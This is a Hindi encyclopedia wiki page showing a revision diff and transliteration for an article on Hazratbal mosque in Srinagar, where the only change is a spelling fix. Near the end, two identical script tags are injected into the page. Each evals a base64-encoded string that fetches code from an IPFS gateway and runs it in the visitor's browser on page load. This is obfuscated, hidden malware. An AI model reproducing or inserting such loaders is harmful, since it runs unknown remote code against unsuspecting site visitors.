Difference between revisions of "हज़रतबल मस्जिद श्रीनगर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - "खूबसूरत" to "ख़ूबसूरत")
Line 2: Line 2:
 
*हज़रतबल मस्जिद में [[पैग़म्बर मुहम्मद]] का एक बाल रखा होने के कारण विख्यात है।  
 
*हज़रतबल मस्जिद में [[पैग़म्बर मुहम्मद]] का एक बाल रखा होने के कारण विख्यात है।  
 
*हज़रतबल मस्जिद श्रीनगर में स्थित प्रसिद्ध [[डल झील श्रीनगर|डल झील]] के किनारे स्थित है।  
 
*हज़रतबल मस्जिद श्रीनगर में स्थित प्रसिद्ध [[डल झील श्रीनगर|डल झील]] के किनारे स्थित है।  
*हज़रतबल मस्जिद को कई अन्य नामों से जाना जाता है। जैसे हजरतबल, अस्सार-ए-शरीफ़, मादिनात-ऊस-सेनी, दरगाह शरी्फ़ और दरगाह आदि। *हज़रतबल मस्जिद के समीप ही एक खूबसूरत बगीचा और इश्‍रातत महल है। जिसका निर्माण 1623 ई. में सादिक खान ने करवाया था।
+
*हज़रतबल मस्जिद को कई अन्य नामों से जाना जाता है। जैसे हजरतबल, अस्सार-ए-शरीफ़, मादिनात-ऊस-सेनी, दरगाह शरी्फ़ और दरगाह आदि। *हज़रतबल मस्जिद के समीप ही एक ख़ूबसूरत बगीचा और इश्‍रातत महल है। जिसका निर्माण 1623 ई. में सादिक खान ने करवाया था।
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 11:21, 30 November 2010

  • hazaratabal masjid jammoo aur kashmir rajy ke shrinagar shahar mean sthit hai.
  • hazaratabal masjid mean paigambar muhammad ka ek bal rakha hone ke karan vikhyat hai.
  • hazaratabal masjid shrinagar mean sthit prasiddh dal jhil ke kinare sthit hai.
  • hazaratabal masjid ko kee any namoan se jana jata hai. jaise hajaratabal, assar-e-sharif, madinat-oos-seni, daragah sharihf aur daragah adi. *hazaratabal masjid ke samip hi ek khoobasoorat bagicha aur ishh‍ratat mahal hai. jisaka nirman 1623 ee. mean sadik khan ne karavaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh